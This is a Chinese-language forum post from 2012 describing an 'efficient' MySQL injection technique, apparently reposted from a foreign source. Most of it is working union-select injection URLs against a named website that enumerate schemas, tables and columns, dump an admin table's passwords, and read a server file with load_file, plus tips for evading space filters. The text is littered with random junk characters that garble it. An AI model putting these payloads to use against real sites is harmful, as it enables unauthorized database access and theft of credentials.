标题: mysql注入高效方法 [打印本页] 作者: admin 时间: 2012-9-13 16:37 标题: mysql注入高效方法 此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似$ O( g4 \6 \3 F
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人 5 a, Z0 t7 ]+ B5 ^: F6 ~. A # E1 Y: |1 K# l e( D! v! V$ v! Q 5 @ |: Y: e; k8 |1 h优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入/ w q1 F, j9 Z w* q4 q
) A% A, |# L) s) o; }; K$ Y
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢.... `$ z$ \2 e) ^8 n h) T
5 t- V- y% \$ k# e4 `( ^4 u, J
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示% a3 @ C" l1 j* P/ r! y
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等; T) A( y9 Z6 Q% S& L
! v+ f! q, h4 b' t) i0 W' Qhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17 : @6 Q6 ^4 N; Z4 z+ x- g; N ( i, e r' f8 C, ?# _& C2 [读出所有库:6 |* T' V. t% _/ f( Z4 d( J% A http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA7 c, E) z8 }+ W+ S% O) I
# E: k6 m1 C* u, _, w6 p" K
+ e; J7 b5 P9 ^5 M
4 t. k4 r( e5 T. o9 Q0 H9 w6 r/ L/ X
读出所有表:. o% s' m0 c9 d. Q http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()! O' L3 {0 o+ q5 ^% I! X& n
5 u% A# D) L7 {: v: L9 I" L读出所有表字段:1 q$ N' ~9 P/ V2 ]# i0 _ http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)/ O7 v9 t/ R" }, ~5 V* Y; z; i6 f
*/ (97,100,109,105,110)为admin的ascii码 依次类推% D( O6 Y) @: i
+ z; z0 w! X3 _. _( ^读出所有表字段里的内容: * `; v) y1 M0 V# ]; _* O, l5 _http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin 3 q9 X: I- W6 {) T; ?) s, x- K6 N0 p# B9 {. i3 Q, I, m
( g( j5 `& g& v1 B
, Z- f F' l9 z8 Z+ V4 K- l; T4 _ J6 k0 q" F4 U
) t7 Y4 [) Q+ C E# z, v4 s
+ B( i: Q( p8 o! L9 K http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23$ X6 V* d& r; {
6 K6 G3 a% z% X4 R# g ) E( D- @7 T& U. Uhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23 4 y) Y; u% K% D# ]4 j" T* Z; `$ }( p* H; s9 ~2 S http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23/ X3 y4 ^1 P- i6 F" y& P/ W